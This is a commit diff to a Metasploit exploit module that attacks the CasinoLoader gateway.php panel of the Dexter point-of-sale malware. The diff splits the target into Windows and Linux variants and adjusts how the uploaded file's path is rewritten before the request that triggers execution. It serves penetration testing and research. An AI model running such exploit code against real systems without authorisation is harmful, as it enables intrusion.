Change URL identifier, and make the user choose a target

Author: wchen-r7

modules/exploits/multi/http/dexter_casinoloader_exec.rb

@@ -29,7 +29,9 @@ def initialize(info={})
         ],
       'References'     =>
         [
-          ["Analysis", "http://www.xylibox.com/2013/08/point-of-sale-malware-infostealerdexter.html"]
+          [
+            "URL", "http://www.xylibox.com/2013/08/point-of-sale-malware-infostealerdexter.html"
+          ]
         ],
       'Payload'        =>
         {
@@ -39,11 +41,12 @@ def initialize(info={})
       'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
-          ['CasinoLoader gateway.php', {}]
+          ['CasinoLoader gateway.php on Windows', {}],
+          ['CasinoLoader gateway.php on Linux',   {}]
         ],
       'Privileged'     => false,
-      'DisclosureDate' => "Feb 08 2014",
-      'DefaultTarget'  => 0))
+      'DisclosureDate' => "Feb 08 2014"
+    ))
 
       register_options(
         [
@@ -154,7 +157,9 @@ def exploit
 
     if res and res.code == 200 and res.body =~ /a href="upload.php\?del=(.*)">/
       path = $1
-      path = path.sub! "\\", "/"
+      if target.name =~ /Linux/
+        path = path.sub! "\\", "/"
+      end
       target_path = normalize_uri(target_uri.path, path)
       print_status("#{peer} - Requesting: #{target_path}")
       send_request_raw({'uri' => normalize_uri(target_path)})